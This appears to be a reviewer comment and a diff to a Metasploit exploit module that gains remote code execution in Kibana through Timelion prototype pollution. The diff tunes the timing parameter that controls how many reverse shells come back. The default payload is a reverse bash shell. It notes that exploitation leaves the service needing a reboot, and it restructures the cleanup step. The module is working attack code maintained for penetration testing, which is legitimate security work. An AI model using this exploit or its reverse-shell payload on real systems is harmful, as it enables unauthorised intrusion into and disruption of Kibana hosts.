now down to 10 shells!

modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb

@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = ManualRanking
   include Msf::Exploit::Remote::HttpClient
   prepend Exploit::Remote::AutoCheck
 
@@ -19,7 +19,13 @@ def initialize(info = {})
           javascript code. This leads to an arbitrary command execution with permissions of the
           Kibana process on the host system.
 
-          Tested against kibana 6.5.4, yielding between 43-53 shells.
+          Exploitation will require a service or system reboot to restore normal operation.
+
+          The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells
+          (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a
+          docker image caused 6 shells.
+
+          Tested against kibana 6.5.4.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -42,7 +48,7 @@ def initialize(info = {})
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'PAYLOAD' => 'cmd/unix/reverse_bash',
-          'WfsDelay' => 60 # can take a minute to run
+          'WfsDelay' => 10 # can take a minute to run
         },
         'Notes' => {
           # the webserver doesn't die, but certain requests no longer respond before a timeout
@@ -171,14 +177,9 @@ def exploit
     print_status('Trigginger payload execution via canvas socket')
     trigger_socket
     print_status('Waiting for shells')
-  rescue ::Rex::ConnectionError
-    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
-  end
-
-  def cleanup
+    Rex.sleep(datastore['WFSDELAY'] / 10)
     print_status('Unsetting to stop raining shells from a lacerated kibana')
     send_injection(reset: true)
     trigger_socket
-    super
   end
 end